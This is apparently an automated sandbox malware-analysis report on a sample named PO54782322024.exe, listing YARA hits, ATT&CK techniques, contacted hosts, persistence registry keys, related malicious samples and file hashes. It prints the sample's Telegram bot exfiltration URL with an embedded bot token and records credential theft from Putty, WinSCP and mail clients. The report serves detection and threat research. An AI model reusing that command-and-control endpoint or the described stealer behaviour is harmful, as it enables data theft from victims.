                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO54782322024.exe.17f15f6db50.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO54782322024.exe.17f15f43b08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO54782322024.exe.17f15f6db50.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.4115057036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Web Service
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API
                        1
                        Registry Run Keys / Startup Folder
                        312
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        11
                        Input Capture
                        24
                        System Information Discovery
                        Remote Desktop Protocol2
                        Data from Local System
                        1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Registry Run Keys / Startup Folder
                        1
                        Obfuscated Files or Information
                        1
                        Credentials in Registry
                        231
                        Security Software Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        11
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Software Packing
                        NTDS1
                        Process Discovery
                        Distributed Component Object Model11
                        Input Capture
                        3
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets151
                        Virtualization/Sandbox Evasion
                        SSH1
                        Clipboard Data
                        14
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain Credentials1
                        Application Window Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                        Virtualization/Sandbox Evasion
                        DCSync1
                        System Network Configuration Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
                        Process Injection
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Hidden Files and Directories
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569681 Sample: PO54782322024.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 29 api.telegram.org 2->29 31 api.ipify.org 2->31 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 8 other signatures 2->53 7 PO54782322024.exe 3 2->7         started        10 AppPoint.exe 2 2->10         started        12 AppPoint.exe 1 2->12         started        signatures3 51 Uses the Telegram API (likely for C&C communication) 29->51 process4 signatures5 55 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->55 57 Writes to foreign memory regions 7->57 59 Allocates memory in foreign processes 7->59 61 Injects a PE file into a foreign processes 7->61 14 RegSvcs.exe 16 13 7->14         started        19 WerFault.exe 19 16 7->19         started        21 conhost.exe 7->21         started        23 conhost.exe 10->23         started        25 conhost.exe 12->25         started        process6 dnsIp7 33 api.telegram.org 149.154.167.220, 443, 49732, 49734 TELEGRAMRU United Kingdom 14->33 35 api.ipify.org 172.67.74.152, 443, 49730 CLOUDFLARENETUS United States 14->35 27 C:\Users\user\AppData\...\AppPoint.exe, PE32 14->27 dropped 37 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->37 39 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->39 41 Tries to steal Mail credentials (via file / registry access) 14->41 43 4 other signatures 14->43 file8 signatures9

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        PO54782322024.exe47%ReversingLabsByteCode-MSIL.Trojan.XWorm
                        PO54782322024.exe49%VirustotalBrowse
                        PO54782322024.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe0%ReversingLabs
                        C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe0%VirustotalBrowse
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ipify.org
                        172.67.74.152
                        truefalse
                          high
                          api.telegram.org
                          149.154.167.220
                          truefalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              high
                              https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocumentfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://api.ipify.orgRegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://upx.sf.netAmcache.hve.5.drfalse
                                    high
                                    https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4116925393.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://api.telegram.orgRegSvcs.exe, 00000002.00000002.4116925393.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://go.micAppPoint.exe, 00000006.00000002.1794954358.00000000014A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              149.154.167.220
                                              api.telegram.orgUnited Kingdom
                                              62041TELEGRAMRUfalse
                                              172.67.74.152
                                              api.ipify.orgUnited States
                                              13335CLOUDFLARENETUSfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1569681
                                              Start date and time:2024-12-06 05:50:05 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 38s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:14
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:PO54782322024.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winEXE@9/12@3/2
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HCA Information:
                                              • Successful, ratio: 90%
                                              • Number of executed functions: 131
                                              • Number of non-executed functions: 6
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target AppPoint.exe, PID 5012 because it is empty
                                              • Execution Graph export aborted for target AppPoint.exe, PID 6048 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              TimeTypeDescription
                                              04:50:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AppPoint C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
                                              04:51:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AppPoint C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
                                              23:50:57API Interceptor12032263x Sleep call for process: RegSvcs.exe modified
                                              23:51:18API Interceptor1x Sleep call for process: WerFault.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              149.154.167.220BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                  ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              G14yjXDQWf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                  • api.ipify.org/
                                                                  Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                  • api.ipify.org/
                                                                  y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                                  • api.ipify.org/
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                  • api.ipify.org/
                                                                  file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                  • api.ipify.org/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  api.telegram.orgBQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                  • 149.154.167.220
                                                                  file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                  • 149.154.167.220
                                                                  ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  G14yjXDQWf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  api.ipify.orghttps://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                  • 104.26.13.205
                                                                  https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                  • 104.26.13.205
                                                                  lC7L7oBBMC.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.13.205
                                                                  0wxckB4Iba.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 172.67.74.152
                                                                  OHScaqAPjt.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                  • 172.67.74.152
                                                                  8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.13.205
                                                                  lUy4SKlE6A.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.12.205
                                                                  xFHqehx1tb.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                  • 104.26.12.205
                                                                  https://app.peony.ink/view/902b02a8-11f0-4e28-89b1-5318035c10ebGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                  • 104.26.12.205
                                                                  7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.12.205
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  TELEGRAMRUBQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                  • 149.154.167.220
                                                                  Setup.exeGet hashmaliciousVidarBrowse
                                                                  • 149.154.167.99
                                                                  Setup.exeGet hashmaliciousVidarBrowse
                                                                  • 149.154.167.99
                                                                  file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                  • 149.154.167.220
                                                                  ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  CLOUDFLARENETUShttps://do.not.click.on.this.link.instantrevert.net/XSEg2WDlKd2JCRDJOMWtwUGE5L0dpYzEyZUF0UjVQWmNQaWl2Q21KaDZSeUhuKzhLc243eHpPN1h4NjVNTnAzblZ6ZFZhaGwydDB1ZHJNUnQ5S25RRk0yTEtDbkhEZUlDZ29KY3lveXU2YW9kWkxheHEvTm1wWU5tWjUvT0lGZHkvR3k2MXBCbkYxdmJkZWl2NnNHa1dFcTFVd29uTklraVNkNHdISUFEbCszRE9tc3RETjdZSXdsaWl3PT0tLWJIaFJQTDlXUWhZQ0V6eWMtLWtnaFdmOHAzRW9zTE12VmNnY2lDS2c9PQ==?cid=2314349904Get hashmaliciousKnowBe4Browse
                                                                  • 104.17.25.14
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.165.166
                                                                  BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                  • 104.21.67.152
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.165.166
                                                                  http://embeds.beehiiv.com/d340f580-bc2a-40d8-9475-db3344c1ebc7Get hashmaliciousUnknownBrowse
                                                                  • 104.18.69.40
                                                                  https://online.coverages.best/informations.html?via=PTonRVU7RklJK0ZJTzAmQVk9NllEODZFRTsmNVY4NzFPPEJZQztWVCA=Get hashmaliciousUnknownBrowse
                                                                  • 172.67.165.222
                                                                  kqq1aAcVUQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 104.21.2.8
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.16.9
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.165.166
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.165.166
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0e965600.invoice.exeGet hashmaliciousFormBookBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  somg.mp3.lnkGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  • 172.67.74.152
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exem30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                    RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      AWB#150332.exeGet hashmaliciousAgentTeslaBrowse
                                                                        SOA_9828392091.exeGet hashmaliciousAgentTeslaBrowse
                                                                          ngPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                            Pi648je050.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                                Termination_List_November_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Payment_Advice_USD_48,054.40_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    M1Y6kc9FpE.exeGet hashmaliciousFormBookBrowse
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.999995050164393
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:vjGxcZsli04fxdhaWB2W4zuiFUZ24lO87:vocZi4fxdham2fzuiFUY4lO87
                                                                                      MD5:0A0A98895C5D5B45ABFEE3C860515A25
                                                                                      SHA1:405456F76F192B31D35644FC5ECEEE157F56C33B
                                                                                      SHA-256:074E5901710EA7C01695BF686C129E87B716E75CF5B0BA781DAE2D9681793F3D
                                                                                      SHA-512:CA8CB2369E134632BD1CDC4336DCD2A63262734EBCB38B941CB827DDE6071CFC949B156116FD68895B2E11194C9CCD354FD019CE012328BED9E44BB163879BB6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.9.3.4.2.5.4.9.6.3.0.8.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.9.3.4.2.5.6.3.0.6.8.3.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.6.5.0.f.4.1.-.f.f.8.d.-.4.b.f.4.-.b.5.3.1.-.5.9.e.3.8.0.2.3.1.b.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.0.5.9.6.4.a.-.b.f.7.5.-.4.9.6.d.-.8.c.4.f.-.c.5.c.5.c.3.7.6.c.d.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.P.O.5.4.7.8.2.3.2.2.0.2.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.a.t.e.k.P.o.r.o.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.b.c.-.0.0.0.1.-.0.0.1.4.-.1.4.1.4.-.1.c.6.e.9.a.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.e.f.1.2.5.9.9.d.9.9.a.2.d.0.3.6.9.8.7.2.0.d.b.2.b.b.4.a.0.8.0.0.0.0.0.0.0.0.!.0.0.0.0.d.c.9.3.e.e.5.0.6.6.5.4.c.5.f.d.1.4.a.6.c.0.c.8.5.1.6.0.9.e.1.d.5.a.a.7.a.c.5.2.!.P.O.5.4.7.8.
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 16 streams, Fri Dec 6 04:50:55 2024, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):376108
                                                                                      Entropy (8bit):3.2912968944137546
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:q8btp9HI2UD3+v9CO4FIUecSrhGmdMPFN1CCq+hqHfNG:q8bVHI283Qh0GrUmdCFFqNFG
                                                                                      MD5:DB0FACCA9BA220E6BC49968C603C4CFA
                                                                                      SHA1:60D67C4629C78E06FF88D674423E6CAB70FBADB8
                                                                                      SHA-256:2758BCD0A68E154018F354209CBD043E03CCC18CF142CEA812BA03A823A6E9B8
                                                                                      SHA-512:FF659A833903E92852273DC367384B2226C8AB6A8E5415CDFCDE5BE4542E6F7DCDCE0E13CD360561B4D44C0A2486D296258628D92DDFEA5B02846A049DE10778
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:MDMP..a..... .........Rg....................................$...........(............G..xn..........l.......8...........T............)..d........... 6...........8..............................................................................eJ.......8......Lw......................T.............Rg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8630
                                                                                      Entropy (8bit):3.7055343832590135
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:R6l7wVeJBdi36Y9iDtagmfZwCCqprB89by9lfxNGm:R6lXJry6YIDtagmf3CByffD
                                                                                      MD5:8BD415F5F2E7825B5E898A8B0A1EFD8B
                                                                                      SHA1:56C67BACE491A6DCD9B29B4EA0D03F7F242BBEE7
                                                                                      SHA-256:F71E3F0F0FA2C888B9A0E2CB8721C713D1E5CD43A6C53922301084562408E3D7
                                                                                      SHA-512:52BFD71316E28F608DF956FBC2BF98073338D53C642A8125BFA62BFFE649AAD2BD51A286291BEF74E6C108F10FEA6D39D9B21CBFDABDAFDA2600C483B608A990
                                                                                      Malicious:false
                                                                                      Reputation:low
